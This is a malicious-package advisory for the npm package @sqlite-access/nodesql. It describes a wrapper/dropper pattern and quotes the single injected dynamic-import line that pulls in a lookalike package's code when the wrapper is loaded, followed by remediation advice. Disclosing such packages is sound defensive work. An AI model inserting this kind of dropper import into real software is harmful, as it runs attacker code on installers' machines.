MAL-2026-6914

    Dashboard / Malicious Package / MAL-2026-6914

    MAL-2026-6914

    Published: 7 Jul 2026Last Modified: 9 Jul 2026Aliases: 
    GHSA-m2mh-6v6x-qh4f

    Summary: Malicious code in @sqlite-access/nodesql (npm)

    Details: Source: amazon-inspector (5454044dfacdd12da8025ba7a7c73260f16c64b29dbd25ebda52af4d03e8450c) The package presents a three-way identity mismatch: the scoped name @sqlite-access/nodesql implies a SQL-access library, the README markets a 'bare-stream' streaming utility, and the shipped index.js is a verbatim copy of the feross/buffer polyfill. Injected at the top of that otherwise-unmodified source is a single line, `var ins = import('@sqlite-access/createsql');`, which performs a fire-and-forget dynamic import of an unrelated lookalike scoped package. On require()/import of @sqlite-access/nodesql, that co-package's module top-level executes in the installer's process. The visible code is a decoy — the payload lives in the transitively loaded @sqlite-access/createsql module, and the wrapper's only functional effect is to pull that code into the consumer's runtime. The identity mismatch (name vs. README vs. code), the empty description, generic author metadata, and the injected dynamic import together constitute a wrapper/dropper pattern designed to smuggle attacker-controlled code into installer graphs via a plausible-looking utility dependency. Source: ghsa-malware (e91ce4fbb00fe250dfef19992c9735bf7c79601ce0faa62e77cef6e0e56bd6e2) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: @sqlite-access/nodesql

    Purl: pkg:npm/%40sqlite-access/nodesql

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.2
    MAL-2026-6914 | CVE-DB